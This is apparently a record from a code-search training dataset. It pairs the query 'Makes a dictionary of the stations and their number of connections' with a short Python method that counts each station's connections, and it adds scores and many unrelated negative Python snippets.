self.signal_cycle_data.emit(self.cd)\n # Duration of the first tare of the system\n tare_duration = 5.0\n time.sleep(tare_duration)\n self.signal_get_tare.emit(tare_duration)\n # Waits a little bit just to make sure that the respirator isn't working when the controller \n # is called\n time.sleep(0.5)\n 
self.piston_control()", "def track_04():\n sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title='Sunshine Live', force_radio=True)\n return \"Ok\"", "def __init__(self, station_file: str, ride_file: str) -> None:\n self.all_stations = create_stations(station_file)\n self.all_rides = create_rides(ride_file, self.all_stations)\n self.visualizer = Visualizer()\n self.active_rides = []" ]
[ "0.73916966", "0.72347254", "0.6283393", "0.5770273", "0.53530777", "0.5282217", "0.5246007", "0.5129842", "0.5115605", "0.5112706", "0.5046593", "0.50430566", "0.5032552", "0.5032552", "0.5012475", "0.50104666", "0.5006915", "0.49982488", "0.49773306", "0.49151057", "0.48719123", "0.4867851", "0.48675522", "0.48566422", "0.48527646", "0.48435965", "0.4822101", "0.4806031", "0.48015013", "0.47571078", "0.47429278", "0.47362965", "0.46954757", "0.4689146", "0.46676704", "0.4663138", "0.46514398", "0.46416545", "0.46394286", "0.4629448", "0.4620208", "0.46197492", "0.4616199", "0.46033698", "0.45730788", "0.4572733", "0.45687827", "0.4555525", "0.4551504", "0.4550578", "0.4531297", "0.45262617", "0.45180565", "0.44948322", "0.44704565", "0.44617343", "0.4460196", "0.44568026", "0.44562238", "0.44491524", "0.4445041", "0.4443889", "0.44312268", "0.44294733", "0.4429072", "0.44232753", "0.44203132", "0.44194084", "0.44115806", "0.44083098", "0.44068122", "0.4404135", "0.4398573", "0.4391987", "0.4386293", "0.43839118", "0.43829063", "0.43821403", "0.4379656", "0.43755886", "0.43722117", "0.43704355", "0.43673813", "0.4366082", "0.43649644", "0.4364628", "0.43607378", "0.43587387", "0.435607", "0.4352831", "0.43509305", "0.43482918", "0.43466926", "0.43462017", "0.43449494", "0.4344154", "0.43437362", "0.43367893", "0.4336417", "0.43354836" ]
0.59082127
3
Makes a dictionary of the stations and their number of connections.
def make_station_dict(self):
    self.station_dict = {}

    # iterates over stations and puts the number of connections in the dict
    for station in self.stations:
        length = len(self.stations[station].connections)
        self.station_dict[station] = length

    return self.station_dict
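For context, a minimal runnable sketch of how a method like this could be exercised. The Station and RailMap classes below are hypothetical stand-ins invented for illustration only; they are not part of the dataset, and the attribute names are assumptions.

class Station:
    # hypothetical stand-in: only the attribute the method relies on
    def __init__(self, name):
        self.name = name
        self.connections = {}  # neighbouring station name -> travel time


class RailMap:
    # hypothetical container exposing self.stations as {name: Station}
    def __init__(self, stations):
        self.stations = stations
        self.station_dict = {}

    def make_station_dict(self):
        self.station_dict = {}
        for station in self.stations:
            self.station_dict[station] = len(self.stations[station].connections)
        return self.station_dict


stations = {"Amsterdam": Station("Amsterdam"), "Utrecht": Station("Utrecht")}
stations["Amsterdam"].connections = {"Utrecht": 26}
stations["Utrecht"].connections = {"Amsterdam": 26}
print(RailMap(stations).make_station_dict())  # {'Amsterdam': 1, 'Utrecht': 1}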
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def stations_dict(self):\n return self.__stations_dict", "def get_online_count():\n return dict(online_user=get_online_users())", "def getConnections():\n\n c = psutil.net_connections()\n connects = {}\n\n count = 0\n for connection in c:\n conn = {}\n status = connection.status\n if status == 'ESTABLISHED' or connection.status == 'CLOSE_WAIT':\n conn['status'] = status\n conn['local'] = connection.laddr[0] + ':' + str(connection.laddr[1])\n conn['remote'] = connection.raddr[0] + ':' + str(connection.raddr[1])\n connects[count] = conn\n count += 1\n elif status == 'LISTEN':\n conn['status'] = status\n conn['local'] = connection.laddr[0] + ':' + str(connection.laddr[1])\n connects[count] = conn\n count += 1\n else:\n pass\n\n return connects", "def get_stats(self):\n return {\n \"pings_sent\" : self.ping_count,\n \"measurements\" : self.measurements,\n }", "def to_dict(self) -> dict:\n return {'Stations': [station.as_json_dict() for station in self.stations]}", "def connected_component_statistics(self, printStats=False):\n lengths = self.connected_component_lengths()\n lengthDict = dict(collections.Counter(lengths))\n\n if printStats:\n orderedLengthDict = collections.OrderedDict(sorted(lengthDict.items()))\n numberOfGroups = nx.number_connected_components(self.return_undirected())\n for k, v in orderedLengthDict.iteritems():\n percent = round((100.00*v / numberOfGroups), 2)\n print str(k) + ' nodes: ' + str(v) + ' (' + str(percent) + '%) groups'\n print '-----------------------------------------'\n print 'TOTAL: ' + str(super(SynonymNetwork, self).number_of_nodes()) + ' nodes in network, ' + str(numberOfGroups) + ' distinct groups'\n else:\n return lengthDict", "def connected_network_devices(self):\n connected = {'ip': self.ip, 'port': self.port}\n return connected", "def num_stations(self) -> int:\n return self._num_stations", "def to_dict(self):\n\n out = super().to_dict()\n out[\"connections\"] = self.connections\n return out", "def to_dict(self):\n result = {'Id': self.id, 'Na': self.name, \\\n 'Sc': self.schedule.to_dict(), 'Lc': self.location.to_dict()}\n if len(self.connections)>0:\n result['Co'] = self.connections_to_string()\n return result", "def station_list() -> List[Dict]:\n return STATIONS", "def create_dict(info):\n \"\"\"\n dict = {ip: {counter:*}, {weekdays: []}, {hours: []}}\n \"\"\"\n dict_info = dict()\n for i in info:\n ip = i[0]\n hours = i[1]\n weekdays = i[2]\n if ip not in dict_info:\n dict_info[ip] = {}\n dict_info[ip]['counter'] = 0\n dict_info[ip]['hours'] = []\n dict_info[ip]['weekdays'] = []\n dict_info[ip]['counter'] += 1\n dict_info[ip]['hours'].append(hours)\n dict_info[ip]['weekdays'].append(weekdays)\n return dict_info", "def stats(series):\n\td={}\n\tfor index in series[\"Country Code\"].unique():\n\t\td[index]={\n\t\t\"total servers\" : len(series.loc[series[\"Country Code\"]==index]),\n\t\t\"lat\" : series.loc[series[\"Country Code\"]==index][\"LAT\"].iat[0],\n\t\t\"long\" : series.loc[series[\"Country Code\"]==index][\"LONG\"].iat[0]\n\t\t}\n\treturn d", "def _get_ogd_stations():\n return {r[\"Station\"] for r in ZamgData.current_observations()}", "def load(self):\n total = sum(self.connections.values())\n return total", "def network_to_dict(self):\n return reduce(lambda x,y: x.update(y) or x, \n [self.downstream(root) for root in self.roots])", "def getUsersBySSID():\n\tstats = {}\n\tms = MobileStation.objects.filter(ssid__isnull=False)\n\tfor ssid in set(MobileStation.objects.values_list('ssid', flat=True)):\n\t\tstats[ssid] = 
MobileStation.objects.areAssociated().filter(ssid=ssid).count()\n\treturn stats", "def get_connections_out(self) -> dict:\n return self.__ni_out", "def get_connections_in(self) -> dict:\n return self.__ni_in", "def totalConnections(analyzer):\n return model.totalConnections(analyzer)", "def result_count(sol,Nt,G):\r\n n = G.number_of_nodes()\r\n dict_freq={}\r\n for i in range(n):\r\n k=G.degree(i)\r\n if k not in dict_freq:\r\n dict_freq[k]=sol[Nt,i]\r\n else:\r\n dict_freq[k]+=sol[Nt,i]\r\n return dict_freq", "def device_values(mac_address,base_stations=[],start=datetime.datetime(2014,1,1,0),end=datetime.datetime(2015,1,1),resolution=1,verbose=False,start_date=None,end_date=None):\n\tif not start_date:\n\t\tstart_date = datetime.datetime(2014,1,1,0,0)\n\tif not end_date:\n\t\tend_date = datetime.datetime(2015,1,1,0,0)\n\t\n\tstart_unix = int(start_date.strftime('%s'))\n\tend_unix = int(end_date.strftime('%s'))\n\t\n\tdjango_devices = FoundDevices.objects.filter(time__range=(start_unix, end_unix),mac_address=mac_address).exclude(mac_address__in=base_stations).values()\n\t\n\tfound_devices = {}\n\tfor entry in django_devices:\n\t\tfound_devices[entry['found_id']] = {'mac_address':entry['mac_address'].encode(\"utf8\"),'station':str(entry['stations_id']),'time':entry['time'].encode(\"utf8\")}\n\t\n\t\n\n\n\tcount = {}\n\n\tstations = set()\n\n\tfor key in found_devices.keys():\n\t\tfound_time = time.localtime(float(found_devices[key]['time']))\n\t\ttime_found = datetime.datetime(found_time.tm_year,found_time.tm_mon,found_time.tm_mday,int(math.floor((found_time.tm_hour/resolution)*resolution)))\n\t\tstation = found_devices[key]['station']\n\t\tstations.add(station)\n\n\t\tif start <= time_found <= end and found_devices[key]['mac_address'] == mac_address:\n\t\t\tif time_found not in count:\n\t\t\t\tcount[time_found] = {'stations':{}}\n\t\t\t\tif station not in count[time_found]['stations'].keys():\n\t\t\t\t\tcount[time_found]['stations'][station] = 1\n\t\t\t\telse:\n\t\t\t\t\tcount[time_found]['stations'][station] += 1\n\n\t\t\telse:\n\t\t\t\tif station not in count[time_found]['stations'].keys():\n\t\t\t\t\tcount[time_found]['stations'][station] = 1\n\t\t\t\telse:\n\t\t\t\t\tcount[time_found]['stations'][station] += 1\n\n\tstart = min(count.keys())\n\tcurrent = min(count.keys())\n\tend = max(count.keys())\n\tstep = datetime.timedelta(hours=resolution)\n\tstations = list(stations)\n\twhile current < end:\n\t\tif current not in count.keys():\n\t\t\tcount[current] = {'stations':{}}\n\n\t\t\n\n\t\t\n\n\t\tcurrent += step\n\ttimes = count.keys()\n\ttimes.sort()\n\tfor current in times:\n\t\tfor station in stations:\n\t\t\t\tif station not in count[current]['stations'].keys():\n\t\t\t\t\tcount[current]['stations'][station] = 0\n\t\t\n\t\tprint current,' ',count[current]['stations']\n\n\treturn count", "def __len__(self):\n return len(self.stations)", "def __node_rep(self):\n node_list_dict = {}\n for (i, beam) in enumerate(self.beams):\n if str(beam['n1']) not in node_list_dict.keys():\n node_list_dict[str(beam['n1'])] = 1\n else:\n node_list_dict[str(beam['n1'])] += 1\n if str(beam['n2']) not in node_list_dict.keys():\n node_list_dict[str(beam['n2'])] = 1\n else:\n node_list_dict[str(beam['n2'])] += 1\n return node_list_dict", "def _create_freq_dist(self):\r\n freq_dict = dict()\r\n\r\n for element in self.data:\r\n if element in freq_dict:\r\n freq_dict[element] += 1\r\n else:\r\n freq_dict[element] = 1\r\n\r\n return freq_dict", "def getNbStations(self) :\n return len(self._stations)", "def 
current_queues(petrol_stations):\n current_queues = {}\n for number_of_station in petrol_stations:\n info = {}\n info['cars in the queue'] = 0\n info['max of queue'] = petrol_stations[number_of_station]['queue']\n current_queues[number_of_station] = info\n return current_queues", "def reload_infos(self):\n self.networks = {}\n networks = self.client.waveform.getNetworkIds()\n # Get stations.\n for key in networks:\n if not key:\n continue\n self.networks[key] = {}\n stations = self.client.waveform.getStationIds(network_id=key)\n for station in stations:\n if not station:\n continue\n self.networks[key][station] = {}\n # Get locations.\n locations = self.client.waveform.getLocationIds(network_id=key,\n station_id=station)\n for location in locations:\n channels = self.client.waveform.getChannelIds(\\\n network_id=key , station_id=station,\n location_id=location)\n self.networks[key][station][location] = [channels]\n # Add current date to Dictionary.\n self.networks['Date'] = UTCDateTime()\n # Also add the server to it.\n self.networks['Server'] = self.client.base_url\n # Open file.\n file = open(self.pickle_file, 'wb')\n pickle.dump(self.networks, file, protocol = 2)\n file.close()", "def get_socket_dictionary(self) -> dict:\n socket_dictionary = {\n \"action\": self.action,\n \"car_id\": self.car_id,\n \"username\": self.username,\n \"password\": self.password,\n \"usertoken\": self.usertoken,\n \"info_date_time\": self.info_date_time,\n \"current_location\": self.current_location,\n \"engineer_bluetooth\": self.engineer_bluetooth,\n \"engineer_code\": self.engineer_code\n }\n return socket_dictionary", "def result_count(sol,Nt,G):\r\n n = G.number_of_nodes()\r\n dict_freq={}\r\n for i in range(n):\r\n k=G.degree(i)\r\n if k not in dict_freq:\r\n dict_freq[k]=sol[Nt,i]\r\n else:\r\n dict_freq[k]+=sol[Nt,i]\r\n return dict_freq", "def data_petrol_stations():\n petrol_stations = {}\n with codecs.open('azs.txt', 'r', encoding='UTF-8') as file_in:\n for string in file_in.readlines():\n string = string.split()\n station_number = int(string[0])\n queue_length = int(string[1])\n petrol_stations[station_number] = {}\n petrol_stations[station_number]['queue'] = queue_length\n petrol_stations[station_number]['kinds'] = string[2:]\n\n return petrol_stations", "def stations():\n stats_all=session.query(stations.station).group_by(stations.station).all()\n station_df=pd.DataFrame(stats_all)\n station_dict= station_df.to_dict()\n return jsonify(station_dict)", "def get_online_register(self):\n res = {}\n count = 0\n for event in self.browse(self.id):\n res[event.id] = {}\n for registration in event.online_registration_ids:\n count += 1\n res[event.id] = count\n self.online_register_current = count\n return res", "def get_graph_dictionary(self):\n nodes = {}\n n = 0\n for node in self.__nodes:\n nodes[n] = tuple(node.get_data())\n n += 1\n\n edges = set()\n for edge in self.__edges:\n new_edge = (edge.get_node_a().get_id(), edge.get_node_b().get_id())\n edges.add(new_edge)\n\n graph_dict = {}\n graph_dict[\"nodes\"] = nodes\n graph_dict[\"edges\"] = edges\n\n return graph_dict", "def _aggregate_networks(self, hosts):\n nts = {}\n for host in hosts:\n # skip hosts which have low-level network names defined\n # this can be extended to pick network type based on the network name\n names = host.get(\"networks\")\n if names:\n continue\n nt = host.get(\"network\")\n if not self._is_network_type(nt):\n continue\n\n count = nts.get(nt, 0)\n count += 1\n nts[nt] = count\n return nts", "def create_count_map(self) 
-> Dict[int, int]:\n res: Dict[int, int] = {}\n for sequence_data in self.model.values():\n sequence_data: NGramsSequence = cast(NGramsSequence, sequence_data)\n for count in sequence_data.next_count.values():\n count: int = cast(int, count)\n if count not in res:\n res[count] = 0\n res[count] += 1\n self.count_map = res\n logger.success('created count map')\n return res", "def stats(self):\r\n return {}", "def GetTimeIntervalsForEachStation(PathInfo):\r\n\tTimeIntervalAtStation = {}\r\n\r\n\tif not PathInfo: return TimeIntervalAtStation\r\n\tif len(PathInfo) < 2: return TimeIntervalAtStation\r\n\r\n\tfor i in range(1, len(PathInfo)):\r\n\t\tConnection1 = PathInfo[i-1]\r\n\t\tConnection2 = PathInfo[i]\r\n\r\n\t\tTripID1 = Connection1[ConnInfoInd['travel_id']]\r\n\t\tTripID2 = Connection2[ConnInfoInd['travel_id']]\r\n\r\n\t\t# check if customer makes a change at station\r\n\t\t# if TripID1 == TripID2: continue\r\n\r\n\t\tstation = Connection2[ConnInfoInd['station_from']]\r\n\r\n\t\tArrivalMin = Connection1[ConnInfoInd['arrival_hour']]*60 + Connection1[ConnInfoInd['arrival_min']]\r\n\t\tDepartureMin = Connection2[ConnInfoInd['departure_hour']]*60 + Connection2[ConnInfoInd['departure_min']]\r\n\r\n\t\tif TimeIntervalAtStation.has_key(station):\r\n\t\t\tTimeIntervalAtStation[station].append((ArrivalMin, DepartureMin))\r\n\t\telse:\r\n\t\t\tTimeIntervalAtStation[station] = [(ArrivalMin, DepartureMin)]\r\n\treturn TimeIntervalAtStation", "def to_dict(self) -> Dict:\n _dict = {}\n if hasattr(self, 'virtual_connections') and self.virtual_connections is not None:\n _dict['virtual_connections'] = [x.to_dict() for x in self.virtual_connections]\n return _dict", "def getNrStations(self):\n return len(self.stationData)", "def create_stat_dic(stat_id, data_directories):\n station_dic = {}\n total_dim = []\n for d,i in data_directories.items():\n files = os.listdir(i)\n for f in files:\n Id = f.split('_'+d)[0]\n if Id == stat_id:\n if d not in station_dic.keys():\n station_dic[d] = [] \n station_dic[d].append(i + '/' + f)\n \n total_dim. append( os.path.getsize (i + '/' + f) )\n \n #print('FOUND!' 
, d , ' ' , f )\n \n size = sum(total_dim) \n return station_dic, size", "def stations ():\n # Query all passengers\n Stns= session.query(Measurement.station, func.count(Measurement.station)).group_by(Measurement.station).all()\n\n allStationns = list(np.ravel(Stns))\n\n return jsonify(allStations)", "def network_io_counters():\r\n f = open(\"/proc/net/dev\", \"r\")\r\n try:\r\n lines = f.readlines()\r\n finally:\r\n f.close()\r\n\r\n retdict = dict()\r\n for line in lines[2:]:\r\n colon = line.find(':')\r\n assert colon > 0, line\r\n name = line[:colon].strip()\r\n fields = line[colon + 1:].strip().split()\r\n bytes_recv = int(fields[0])\r\n packets_recv = int(fields[1])\r\n errin = int(fields[2])\r\n dropin = int(fields[2])\r\n bytes_sent = int(fields[8])\r\n packets_sent = int(fields[9])\r\n errout = int(fields[10])\r\n dropout = int(fields[11])\r\n retdict[name] = nt_net_iostat(bytes_sent, bytes_recv, packets_sent, packets_recv,\r\n errin, errout, dropin, dropout)\r\n return retdict", "def get_connections(capture):\n ip_dict = dict()\n for pkt in capture:\n\n if not hasattr(pkt, \"ip\") and not hasattr(pkt, \"ipv6\"):\n continue\n\n protocol = pkt.highest_layer\n\n tcp_dst_port = None\n tcp_src_port = None\n if hasattr(pkt, \"tcp\"):\n tcp_src_port = pkt.tcp.srcport\n tcp_dst_port = pkt.tcp.dstport\n\n if hasattr(pkt, \"ip\"):\n if pkt.ip.src.startswith(\"192.168.178\"):\n ip, dst = pkt.ip.src, pkt.ip.dst\n else:\n ip, dst = pkt.ip.dst, pkt.ip.src\n tcp_dst_port = tcp_src_port\n else:\n # TODO: how to discern src and dst in IPv6?\n ip, dst = pkt.ipv6.src, pkt.ipv6.dst\n\n ip = \"%s\" % ip\n dkey = (\n \"%s\" % protocol,\n int(tcp_dst_port) if tcp_dst_port else None,\n \"%s\" % dst\n )\n if ip not in ip_dict:\n ip_dict[ip] = {dkey: 1}\n else:\n ip_dict[ip][dkey] = ip_dict[ip].get(dkey, 0) + 1\n return ip_dict", "def get_network_info_dict(network):\n info_str = nx.info(network)\n lines = info_str.split('\\n')\n\n info_dict = {}\n for line in lines:\n pair = line.split(':')\n info_dict[pair[0]] = pair[1].strip()\n\n return info_dict", "def get_num_connections(self):\n\n synapses = 0\n for mat in self.weights:\n synapses += mat.size\n return synapses", "def instanceAnalysis(instance):\n arrivals = defaultdict(int)\n for event in instance:\n if isinstance(event, Arrival):\n arrivals[event.node] += 1\n return {key: arrivals[key] for key in sorted(arrivals.keys())}", "def _create_word_count_dict(self):\n word_counts = dict()\n for wc in self.word_counts.all():\n word_counts[wc.word.name] = wc.count\n return word_counts", "def minion_connection_stats(self, minions):\n\n online_minions = list()\n offline_minions = list()\n expired_minions = list()\n\n for minion_obj in minions:\n\n # get UTC current date time\n current_datetime = datetime.datetime.utcnow()\n current_datetime = current_datetime.replace(tzinfo=pytz.utc)\n\n # get the last seen date time\n last_seen = minion_obj.last_seen\n\n # get the time difference\n try:\n delta_diff = current_datetime - last_seen\n except Exception as err:\n delta_diff = None\n\n if delta_diff:\n days_count = delta_diff.days\n else:\n # just to make sure if empty datetime is handled\n days_count = 99999\n\n # is minion up since x days\n if days_count >= settings.MINION_EXPIRY:\n expired_minions.append(minion_obj)\n\n # get a list of minions up\n elif minion_obj.is_minion_up:\n online_minions.append(minion_obj)\n\n # get all offline minions\n elif not minion_obj.is_minion_up:\n offline_minions.append(minion_obj)\n\n return 
dict(online_minions=len(online_minions),\n expired_minions=len(expired_minions),\n offline_minions=len(offline_minions))", "def to_dict(self) -> Dict:\n _dict = {}\n if hasattr(self, 'name') and self.name is not None:\n _dict['name'] = self.name\n if hasattr(self, 'total_connections') and self.total_connections is not None:\n _dict['total_connections'] = self.total_connections\n return _dict", "def stations():\n\n # Open sessions\n session = Session(bind=engine)\n\n # Query DB for StationID and Station Name\n results=session.query(Station.station,Station.name).all()\n\n # Initiating an empty dictionary\n stations={}\n\n # Going over the results and storing them in stations dict reated previously\n for id,name in results:\n station={id:name}\n stations.update(station)\n\n # Main API dict that holds an info key and a stations key with the stations ids and names\n stationsAPI={'info':'Available stations responsible for the observations',\n 'stations':stations\n }\n \n # Returing the main dictionary in a JSON format API response \n return jsonify(stationsAPI)", "def network_dict(self):\n\n data = {}\n data['network'] = {\n 'weights': self._conv_weights + self._lin_weights,\n 'dims': self.net_dims,\n 'activation': 'relu',\n 'accuracy': self.accuracy,\n 'kernel_size': self.kernel_size\n }\n\n return data", "def to_dict (self):\n return {\n 'lengths': self.lengths,\n 'lowerCounts': self.lower_counts,\n 'upperCounts': self.upper_counts,\n 'digitCounts': self.digit_counts,\n 'symbolCounts': self.symbol_counts,\n 'classCounts': self.class_counts,\n 'wordCounts': self.word_counts\n }", "def stations(): \n # creating the Docstring\n session = Session(engine)\n\n # creat the Query stations\n\n stations_qu = session.query(measurement.station).group_by(measurement.station).all()\n\n # Converting the list of tuples into a normal list\n stations_qu_dict = list(np.ravel(stations_qu))\n session.close()\n\n return jsonify(stations_qu_dict)", "def count(wrd):\n ltrs = {}\n for i in wrd:\n ltrs[i] = wrd.count(i)\n return ltrs", "def count(self):\n count = {}\n\n for path, lines in self.lines_added.items():\n count[path] = count.get(path, 0) + sum(lines)\n\n for path, lines in self.lines_removed.items():\n count[path] = count.get(path, 0) + sum(lines)\n\n return count", "def stations():\n # Query all stations\n results = session.query(Measurement.station).group_by(Measurement.station).all()\n all_sessions = list(np.ravel(results))\n return jsonify(all_sessions)", "def collect_stations(self):\n # First, iterate provinces and build url's\n site = urllib.request.urlopen(self.base_url)\n\n # Check that the site is still valid or operating by collecting a list of provinces\n print(\"Collecting provinces\")\n provinces = [s[9:11] for s in re.findall('<a href=\"../\">../</a>', site.read())]\n\n # Iterate provinces and collect list of available times\n print(\"Collecting time periods and station ID's\")\n self.stations = defaultdict(dict)\n for prov in provinces:\n site = urllib.request.urlopen(self.build_url(prov))\n expression = '<a href=\"[hd][a-zA-Z]*/\">[hd][a-zA-Z]*/</a>'\n times = [s.split('>')[1].split('<')[0].replace('/', '') for s in re.findall(expression, site.read())]\n\n # Iterate times and collect the station ID's\n for time in times:\n site = urllib.request.urlopen(self.build_url(prov, time))\n expression = '<a href=\"{0}_[a-zA-Z0-9]*_{1}_hydrometric.csv\">{0}_[a-zA-Z0-9]*_{1}_hydrometric.csv</a>'\n expression = expression.format(prov.upper(), time.lower())\n stations = [s.split('_')[1] for s in 
re.findall(expression, site.read())]\n self.stations[prov][time] = stations", "def networks(self) -> dict:\n return self.data[\"networks\"]", "def stations():\n results = session.query(Station.station,Station.name).all()\n key=[results[i][0] for i in range(len(results))]\n values=[results[i][1] for i in range(len(results))]\n results=dict(zip(key,values))\n print(f\"Route /api/v1.0/stations is being visited\")\n return jsonify(results)", "def get_network_stats(net):\n return net.get_num_connections(), net.num_neurons, len(net.neurons_in_layer)", "def stations():\n\n return station_list", "def _get_as_dict_count(self):\n counter = Counter()\n for product in self.products:\n counter[product.id] += 1\n return counter", "def get_sensor_summary_info(self):\n import statistics\n info_dict = dict()\n logger.debug(\"Creating Database Engine and Session.\")\n db_engine = sqlalchemy.create_engine(self.db_info_obj.dbConn)\n session_sqlalc = sqlalchemy.orm.sessionmaker(bind=db_engine)\n ses = session_sqlalc()\n\n logger.debug(\"Find the scene count.\")\n vld_scn_count = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.Invalid == False).count()\n invld_scn_count = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.Invalid == True).count()\n dwn_scn_count = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.Downloaded == True).count()\n ard_scn_count = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.ARDProduct == True).count()\n dcload_scn_count = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.DCLoaded == True).count()\n arch_scn_count = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.Archived == True).count()\n info_dict['n_scenes'] = dict()\n info_dict['n_scenes']['n_valid_scenes'] = vld_scn_count\n info_dict['n_scenes']['n_invalid_scenes'] = invld_scn_count\n info_dict['n_scenes']['n_downloaded_scenes'] = dwn_scn_count\n info_dict['n_scenes']['n_ard_processed_scenes'] = ard_scn_count\n info_dict['n_scenes']['n_dc_loaded_scenes'] = dcload_scn_count\n info_dict['n_scenes']['n_archived_scenes'] = arch_scn_count\n logger.debug(\"Calculated the scene count.\")\n\n logger.debug(\"Find the scene file sizes.\")\n file_sizes = ses.query(EDDSentinel1ASF.Total_Size).filter(EDDSentinel1ASF.Invalid == False).all()\n if file_sizes is not None:\n if len(file_sizes) > 0:\n file_sizes_nums = list()\n for file_size in file_sizes:\n if file_size[0] is not None:\n file_sizes_nums.append(file_size[0])\n if len(file_sizes_nums) > 0:\n total_file_size = sum(file_sizes_nums)\n info_dict['file_size'] = dict()\n info_dict['file_size']['file_size_total'] = total_file_size\n if total_file_size > 0:\n info_dict['file_size']['file_size_mean'] = statistics.mean(file_sizes_nums)\n info_dict['file_size']['file_size_min'] = min(file_sizes_nums)\n info_dict['file_size']['file_size_max'] = max(file_sizes_nums)\n if len(file_sizes_nums) > 1:\n info_dict['file_size']['file_size_stdev'] = statistics.stdev(file_sizes_nums)\n info_dict['file_size']['file_size_median'] = statistics.median(file_sizes_nums)\n if (len(file_sizes_nums) > 1) and (eodatadown.py_sys_version_flt >= 3.8):\n info_dict['file_size']['file_size_quartiles'] = statistics.quantiles(file_sizes_nums)\n logger.debug(\"Calculated the scene file sizes.\")\n\n logger.debug(\"Find download and processing time stats.\")\n download_times = []\n ard_process_times = []\n scns = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.Downloaded == True)\n for scn in scns:\n download_times.append((scn.Download_End_Date - scn.Download_Start_Date).total_seconds())\n if scn.ARDProduct:\n 
ard_process_times.append((scn.ARDProduct_End_Date - scn.ARDProduct_Start_Date).total_seconds())\n\n if len(download_times) > 0:\n info_dict['download_time'] = dict()\n info_dict['download_time']['download_time_mean_secs'] = statistics.mean(download_times)\n info_dict['download_time']['download_time_min_secs'] = min(download_times)\n info_dict['download_time']['download_time_max_secs'] = max(download_times)\n if len(download_times) > 1:\n info_dict['download_time']['download_time_stdev_secs'] = statistics.stdev(download_times)\n info_dict['download_time']['download_time_median_secs'] = statistics.median(download_times)\n if (len(download_times) > 1) and (eodatadown.py_sys_version_flt >= 3.8):\n info_dict['download_time']['download_time_quartiles_secs'] = statistics.quantiles(download_times)\n\n if len(ard_process_times) > 0:\n info_dict['ard_process_time'] = dict()\n info_dict['ard_process_time']['ard_process_time_mean_secs'] = statistics.mean(ard_process_times)\n info_dict['ard_process_time']['ard_process_time_min_secs'] = min(ard_process_times)\n info_dict['ard_process_time']['ard_process_time_max_secs'] = max(ard_process_times)\n if len(ard_process_times) > 1:\n info_dict['ard_process_time']['ard_process_time_stdev_secs'] = statistics.stdev(ard_process_times)\n info_dict['ard_process_time']['ard_process_time_median_secs'] = statistics.median(ard_process_times)\n if (len(ard_process_times) > 1) and (eodatadown.py_sys_version_flt >= 3.8):\n info_dict['ard_process_time']['ard_process_time_quartiles_secs'] = statistics.quantiles(\n ard_process_times)\n logger.debug(\"Calculated the download and processing time stats.\")\n\n if self.calc_scn_usr_analysis():\n plgin_lst = self.get_usr_analysis_keys()\n info_dict['usr_plugins'] = dict()\n for plgin_key in plgin_lst:\n info_dict['usr_plugins'][plgin_key] = dict()\n scns = ses.query(EDDSentinel1ASFPlugins).filter(EDDSentinel1ASFPlugins.PlugInName == plgin_key).all()\n n_err_scns = 0\n n_complete_scns = 0\n n_success_scns = 0\n plugin_times = []\n for scn in scns:\n if scn.Completed:\n plugin_times.append((scn.End_Date - scn.Start_Date).total_seconds())\n n_complete_scns += 1\n if scn.Success:\n n_success_scns += 1\n if scn.Error:\n n_err_scns += 1\n info_dict['usr_plugins'][plgin_key]['n_success'] = n_success_scns\n info_dict['usr_plugins'][plgin_key]['n_completed'] = n_complete_scns\n info_dict['usr_plugins'][plgin_key]['n_error'] = n_err_scns\n if len(plugin_times) > 0:\n info_dict['usr_plugins'][plgin_key]['processing'] = dict()\n info_dict['usr_plugins'][plgin_key]['processing']['time_mean_secs'] = statistics.mean(plugin_times)\n info_dict['usr_plugins'][plgin_key]['processing']['time_min_secs'] = min(plugin_times)\n info_dict['usr_plugins'][plgin_key]['processing']['time_max_secs'] = max(plugin_times)\n if len(plugin_times) > 1:\n info_dict['usr_plugins'][plgin_key]['processing']['time_stdev_secs'] = statistics.stdev(plugin_times)\n info_dict['usr_plugins'][plgin_key]['processing']['time_median_secs'] = statistics.median(plugin_times)\n if (len(plugin_times) > 1) and (eodatadown.py_sys_version_flt >= 3.8):\n info_dict['usr_plugins'][plgin_key]['processing']['time_quartiles_secs'] = statistics.quantiles(plugin_times)\n ses.close()\n return info_dict", "def _make_dict(self, service):\n\n if service['ServiceAddress']:\n host = service['ServiceAddress']\n else:\n host = service['Address']\n \n\n info = {\n 'host': host,\n 'port': service['ServicePort']\n } \n\n return info;", "def info_about_petrol_kinds(petrol_stations):\n 
info_about_petrol_kinds = {}\n info_about_petrol_kinds['total amount of petrol'] = 0\n\n for number_of_petrol in petrol_stations:\n for petrol_name in petrol_stations[number_of_petrol]['kinds']:\n if petrol_name not in info_about_petrol_kinds:\n info = {}\n if petrol_name == 'АИ-80':\n price = 38.95\n elif petrol_name == 'АИ-92':\n price = 43.01\n elif petrol_name == 'АИ-95':\n price = 45.69\n elif petrol_name == 'АИ-98':\n price = 49.2\n info['price'] = price\n info['stations'] = [number_of_petrol]\n info['amount of petrol'] = 0\n info_about_petrol_kinds[petrol_name] = info\n else:\n info = info_about_petrol_kinds[petrol_name]\n info['stations'] = info['stations'] + [number_of_petrol]\n return info_about_petrol_kinds", "def connections_to_graph_dict(connections_array):\n graph_dict = {}\n for connection in connections_array:\n if connection[0] not in graph_dict:\n graph_dict[connection[0]] = []\n graph_dict[connection[0]].append(connection[1])\n return graph_dict", "def _get_wireguard_stats():\n\n num_wireguard = 0\n try:\n epoch_now = int(datetime.utcnow().timestamp())\n for peer in WireGuardPeer.yield_peers():\n if peer.is_handshake_recent(epoch_now):\n num_wireguard += 1\n except Exception as exc:\n logging.debug(\"Error getting wireguard connections: %s\", exc)\n\n return num_wireguard", "def _get_data(self):\n raw_data = self._get_raw_data()\n if not raw_data:\n return None\n result = {}\n for line in raw_data:\n if 'tcp' in line:\n parts = line.split()\n proto = parts[0]\n local_addr = parts[3]\n state = parts[5]\n ip, port = local_addr.rsplit(':', 1)\n port = str(port)\n result[port] = 1\n if state == 'LISTEN':\n if port not in self.charts['ports']:\n self.charts['ports'].add_dimension([port, port, 'absolute'])\n return result", "def summary_by_datacenter(self):\r\n datacenters = {}\r\n unique_vms = 